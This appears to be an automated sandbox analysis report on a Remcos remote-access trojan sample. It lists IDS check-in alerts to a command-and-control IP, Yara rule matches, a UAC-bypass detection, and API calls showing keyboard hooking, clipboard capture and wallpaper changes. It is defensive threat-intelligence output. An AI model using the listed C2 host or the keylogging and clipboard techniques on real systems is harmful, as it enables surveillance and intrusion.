                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50091 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50077 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50071 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50113 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50106 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50114 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50107 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50112 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50117 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50075 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50116 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50072 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50111 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50118 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50096 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50119 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50110 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50115 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50102 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50081 -> 192.210.150.26:3678
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 192.210.150.26
                    Source: Joe Sandbox ViewIP Address: 192.210.150.26 192.210.150.26
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00BC22EE
                    Source: Milburr.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: Milburr.exe, 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Milburr.exe, 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Milburr.exe, 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000002_2_004099E4
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BC4164
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BC4164
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_004159C6
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00734164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00734164
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BC3F66
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BB001C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BDCABC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0074CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0074CABC
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041BB77 SystemParametersInfoW,2_2_0041BB77
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041BB77 SystemParametersInfoW,5_2_0041BB77

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: This is a third-party compiled AutoIt script.0_2_00B53B3A
                    Source: l1QC9H0SNR.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: l1QC9H0SNR.exe, 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ff0710b1-8
                    Source: l1QC9H0SNR.exe, 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_77596639-c
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: This is a third-party compiled AutoIt script.2_2_006C3B3A
                    Source: Milburr.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: Milburr.exe, 00000002.00000002.4568068709.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_832eee1c-1
                    Source: Milburr.exe, 00000002.00000002.4568068709.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5d257fcd-a
                    Source: Milburr.exe, 00000004.00000002.2268483446.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5fadeae3-d
                    Source: Milburr.exe, 00000004.00000002.2268483446.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_68826bf8-7
                    Source: Milburr.exe, 00000005.00000002.2280550392.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_460592e9-d
                    Source: Milburr.exe, 00000005.00000002.2280550392.0000000000774000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_26033025-9
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B53633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00B53633
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00BDC1AC
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00BDC498
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00BDC5FE
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC57D SendMessageW,NtdllDialogWndProc_W,0_2_00BDC57D
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC8BE NtdllDialogWndProc_W,0_2_00BDC8BE
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC88F NtdllDialogWndProc_W,0_2_00BDC88F
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC860 NtdllDialogWndProc_W,0_2_00BDC860
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC93E ClientToScreen,NtdllDialogWndProc_W,0_2_00BDC93E
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDC909 NtdllDialogWndProc_W,0_2_00BDC909
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BDCABC
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDCA7C GetWindowLongW,NtdllDialogWndProc_W,0_2_00BDCA7C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B51290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00B51290
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B51287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74A3C8D0,NtdllDialogWndProc_W,0_2_00B51287
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDD3B8 NtdllDialogWndProc_W,0_2_00BDD3B8
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BDD43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00BDD43E
